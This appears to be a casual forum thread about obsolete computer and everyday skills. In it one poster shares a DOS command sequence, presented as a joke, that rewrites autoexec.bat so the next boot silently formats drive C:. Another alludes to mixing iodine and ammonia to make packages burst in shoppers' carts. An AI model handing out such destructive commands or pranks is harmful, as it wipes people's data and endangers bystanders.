You guys don't use floppies to boot ever? I'll occasionally run memtest off a floppy, and I'd say I've used the windows 98 boot disk within the last year. And of course, I sometimes need to load a disk controller drive during an install.

Since when is calling a sex line a skill?

There is no such thing as an obsolete skill. The more things that you can do and remember the more versatile you are - in the future. ;)

I'm grinning to myself about those that think most/all of the items on that list are obsolete. Look no further for a list of Darwin award nominees. :)

I used to know how to use an Apple computer from elementary school - does that count? Do people still use Apple computers?

Oh the irony username vs. text...

Yes they do! Even the x86 crapintosh featuring the suck-it 370 tullwhipin processor, precision regulated Deer-tick power supply, and searing channel raid controller by VIAnoworks tech.

yeah but, you still remember how to do that? I mean I had to do that alot playing games like Master of Magic and Master of Orion but if I had to do it again right now I'd be totally lost. If you still remember how to do that then you got some damn good RAM in your head.

Vaguely.

I always found the following sequence to be quite funny.

Copy Con c:\debug.txt
E 40:72 34 12
RCS
FFFF
RIP
0000
G
^Z
Copy Con c:\y.txt
y

^Z
Copy Con c:\autoexec.bat
format c: /q < y.txt > NULL
^Z
Copy Con reboot.bat
debug < debug.txt
^Z
reboot

Can't pump the foot... makes too much wind and blows out the candles!

Yeh, I still boot with floppies. I have a network boot disk here at work and when I make changes to it they are not saved if I boot off a CD. But all of our new servers do not have floppies... so I guess I will start having to boot from a thumb drive.

I know how to make a Nintendo work when the game gets all glitchy.

Is that obsolete?

Knowing Algol, it's a programming language.

Knowing the right amount of iodine and ammonia to make milk packages burst open when someone put them in their cart (maybe not so obsolete, but you couldn't even find the recepie on the net for this, it's effects is shown rather often on discovery though)

Knowing how to disassemble a carburator.
